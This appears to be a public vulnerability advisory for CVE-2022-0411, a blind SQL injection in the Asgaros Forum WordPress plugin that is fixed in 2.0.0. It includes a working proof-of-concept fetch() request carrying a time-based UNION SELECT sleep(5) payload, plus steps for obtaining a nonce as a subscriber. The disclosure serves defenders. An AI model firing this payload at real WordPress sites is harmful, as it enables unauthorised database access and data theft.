Asgaros Forum < 2.0.0 – Subscriber+ Blind SQL Injection | CVE 2022-0411 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the post_id parameter before using it in a SQL statement via a REST route of the plugin (accessible to any authenticated user), leading to a SQL injection

Proof of Concept

As any authenticated user, such as subscriber

To get the nonce: /wp-admin/admin-ajax.php?action=rest-nonce

fetch("?rest_route=/asgaros-forum/v1/reaction/1/hello", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "post_id=1 UNION SELECT 1, 1, 1, 1, 1,2,3,4,5,sleep(5) FROM dual -- g&_wpnonce=59c63b25b1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Fixed in 2.0.0

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2669226/asgaros-forum

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

35272197-c973-48ad-8405-538bfbafa172

Timeline

Publicly Published

2022-01-31 (about 3 years ago)

Added

2022-01-31 (about 3 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2024-08-13

Title

Viral Signup <= 2.1 - Unauthenticated SQLi

Published

2024-04-04

Title

WP Directory Kit < 1.3.1 - Authenticated (Subscriber+) SQL Injection

Published

2025-03-28

Title

Slider by BestWebSoft < 1.1.1 - Authenticated (Administrator+) SQL Injection

Published

2024-12-12

Title

Instant Appointment <= 1.2 - Unauthenticated SQL Injection

Published

2016-04-06

Title

All In One WP Security And Firewall < 4.0.7 - Multiple SQL Injections